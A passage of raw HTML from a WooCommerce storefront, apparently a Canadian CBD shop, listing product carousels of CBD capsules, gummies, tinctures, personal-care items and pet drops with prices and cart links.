class="elementor-element elementor-element-5c4e75eb elementor-widget elementor-widget-image" data-id="5c4e75eb" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="1475" height="897" src="https://shopopenmarket.com/wp-content/uploads/cbd-oil-toronto-canada-slide2CCC.jpg" class="attachment-large size-large wp-image-218" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/cbd-oil-toronto-canada-slide2CCC.jpg 1475w, https://shopopenmarket.com/wp-content/uploads/cbd-oil-toronto-canada-slide2CCC-768x467.jpg 768w, https://shopopenmarket.com/wp-content/uploads/cbd-oil-toronto-canada-slide2CCC-416x253.jpg 416w" sizes="(max-width: 1475px) 100vw, 1475px" /> </div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-0d65a80 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="0d65a80" data-element_type="section" data-settings="{"stretch_section":"section-stretched"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c79b77a" data-id="c79b77a" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-2dadf16 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="2dadf16" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-e6804cf" data-id="e6804cf" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-3d7955e elementor-widget elementor-widget-heading" data-id="3d7955e" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">CBD Oil Toronto, Canada - Full Spectrum & Isolate</h2> </div> </div> </div> </div> </div> </div> </div> </section> <div class="elementor-element elementor-element-d73de31 elementor-widget elementor-widget-woolentor-universal-product" data-id="d73de31" data-element_type="widget" data-widget_type="woolentor-universal-product.default"> <div class="elementor-widget-container"> <div class="ht-row"> <div class=" ht-products woocommerce product-slider" dir="ltr" data-settings='{"arrows":true,"dots":false,"autoplay":true,"autoplay_speed":3000,"animation_speed":300,"pause_on_hover":true,"rtl":false,"product_items":4,"scroll_columns":1,"tablet_width":750,"tablet_display_columns":2,"tablet_scroll_columns":2,"mobile_width":480,"mobile_display_columns":1,"mobile_scroll_columns":1}' style='display:none' > <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <span class="ht-product-label ht-product-label-right">Sale!</span> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/12-or-36-caps-10mg-each/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles6-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="1151" aria-label="CBD capsules 12 or 36 caps 10mg each"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=1151" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1151" data-product_sku="CBD personal care-1-2" aria-label="Add “CBD capsules 12 or 36 caps 10mg each” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/12-or-36-caps-10mg-each/'>CBD capsules 12 or 36 caps 10mg each</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30252799" data-product-id="1151"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <span class="ht-product-label ht-product-label-right">Sale!</span> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/300mgcbd/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="1148" aria-label="CBD gummies Jar/ 30pieces 300mgCBD"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=1148" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1148" data-product_sku="CBD personal care-1-1" aria-label="Add “CBD gummies Jar/ 30pieces 300mgCBD” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/300mgcbd/'>CBD gummies Jar/ 30pieces 300mgCBD</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025313f" data-product-id="1148"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <span class="ht-product-label ht-product-label-right">Sale!</span> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="1142" aria-label="CBD gummies bags/6 pieces 200mgCBD"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=1142" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1142" data-product_sku="CBD personal care-1" aria-label="Add “CBD gummies bags/6 pieces 200mgCBD” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/'>CBD gummies bags/6 pieces 200mgCBD</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce302539ed" data-product-id="1142"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/bath-bomb-100mg-2/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-5-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="1126" aria-label="bath bomb 100mg"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=1126" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1126" data-product_sku="logo-collection-1-1-1" aria-label="Add “bath bomb 100mg” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/bath-bomb-100mg-2/'>bath bomb 100mg</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30254154" data-product-id="1126"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="1124" aria-label="oil sugar scrub1000mg"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=1124" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1124" data-product_sku="logo-collection-1-1" aria-label="Add “oil sugar scrub1000mg” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/'>oil sugar scrub1000mg</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30254920" data-product-id="1124"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/lube-1000mg/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="942" aria-label="lube 1000mg"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=942" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="942" data-product_sku="logo-collection-1" aria-label="Add “lube 1000mg” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/lube-1000mg/'>lube 1000mg</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce30254fc7" data-product-id="942"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-1-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-1-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-1-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="35" aria-label="oil sugar scrub1000mg"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=35" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="35" data-product_sku="logo-collection" aria-label="Add “oil sugar scrub1000mg” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/oil-sugar-scrub1000mg/'>oil sugar scrub1000mg</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce302556ab" data-product-id="35"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <span class="ht-product-label ht-product-label-right">Sale!</span> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/oil-tincture-30ml-or-60-ml-size-bottle/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="34" aria-label="Oil tincture 30ml or 60 ml size bottle"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=34" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="34" data-product_sku="Woo-beanie-logo" aria-label="Add “Oil tincture 30ml or 60 ml size bottle” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/oil-tincture-30ml-or-60-ml-size-bottle/'>Oil tincture 30ml or 60 ml size bottle</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025611c" data-product-id="34"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 20.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></ins></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/amount-of-cbd-100mg-500mg-1000mg/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles2-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles2-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles2-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="33" aria-label="Amount of CBD 100mg 500mg 1000mg"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=33" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="33" data-product_sku="Woo-tshirt-logo" aria-label="Add “Amount of CBD 100mg 500mg 1000mg” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/amount-of-cbd-100mg-500mg-1000mg/'>Amount of CBD 100mg 500mg 1000mg</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025692d" data-product-id="33"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> <!--Product Start--> <div class="ht-product mb-30 product ht-col-xs-12 ht-product-action-bottom ht-product-ratting-top-right ht-product-countdown-fill"> <div class="ht-product-inner"> <div class="ht-product-image-wrap"> <span class="ht-product-label ht-product-label-right">Sale!</span> <div class="ht-product-image"> <a href="https://shopopenmarket.com/product/cbd-personal-care/"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles3-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles3-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles3-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> </div> <div class="ht-product-action"> <ul class="woolentor-action-btn-area"> <li> <a href="#" class="woolentorquickview" data-quick-id="26" aria-label="lube 1000mg"> <i class="sli sli-magnifier"></i> <span class="ht-product-action-tooltip">Quick View</span> </a> </li> <li class="woolentor-cart"><a href="?add-to-cart=26" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="26" data-product_sku="CBD personal care" aria-label="Add “lube 1000mg” to your cart" rel="nofollow">Add to cart</a></li> </ul> </div> </div> <div class="ht-product-content"> <div class="ht-product-content-inner"> <div class="ht-product-categories"></div> <h4 class='ht-product-title'><a href='https://shopopenmarket.com/product/cbd-personal-care/'>lube 1000mg</a></h4> <div class="ht-product-price"> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce302570f4" data-product-id="26"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> <div class="ht-product-ratting-wrap"></div> </div> </div> </div> </div> <!--Product End--> </div> </div> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-fb17b78 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="fb17b78" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-683037e" data-id="683037e" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-85494ef elementor-widget elementor-widget-heading" data-id="85494ef" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">CBD2GO retails a wide selection of premium, 100% Natural CBD products. We offer a wide selection of products, including CBD Tinctures, CBD Edibles, CBD Capsules, CBD Vapes, CBD Pet Products, Lotions, Salves and more! We offer express shipping throughout Canada.</p> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-3ee0200 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3ee0200" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-02f6aa8" data-id="02f6aa8" data-element_type="column" data-settings="{"animation":"none"}"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-ff5eee5 animated-slow elementor-invisible elementor-widget elementor-widget-woolentor-product-tab" data-id="ff5eee5" data-element_type="widget" data-settings="{"_animation":"fadeInLeft"}" data-widget_type="woolentor-product-tab.default"> <div class="elementor-widget-container"> <div class="product-style"> <div class="product-tab-list ht-text-center"> <ul class="ht-tab-menus"> </ul> </div> <div class="ht-row"> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/lube-1000mg/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=942" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="942" data-product_sku="logo-collection-1" aria-label="Add “lube 1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/lube-1000mg/">lube 1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025bc28" data-product-id="942"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/sunglasses/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Vape2-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Vape2-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Vape2-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=20" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="20" data-product_sku="woo-sunglasses" aria-label="Add “CBD for Pets drops bacon salon beef 30 ml bottle” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/sunglasses/">CBD for Pets drops bacon salon beef 30 ml bottle</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025c3e9" data-product-id="20"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 90.00</bdi></span></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1142" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1142" data-product_sku="CBD personal care-1" aria-label="Add “CBD gummies bags/6 pieces 200mgCBD” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/">CBD gummies bags/6 pieces 200mgCBD</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025c982" data-product-id="1142"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/hoodie-with-pocket/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-324x324.png" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-324x324.png 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=21" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="21" data-product_sku="woo-hoodie-with-pocket" aria-label="Add “CBD 100mg or 300mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/hoodie-with-pocket/">CBD 100mg or 300mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3025d295" data-product-id="21"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 45.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 35.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/oil-sugar-scrub1000mg-2/" class="image"> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-personal-care-3-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" 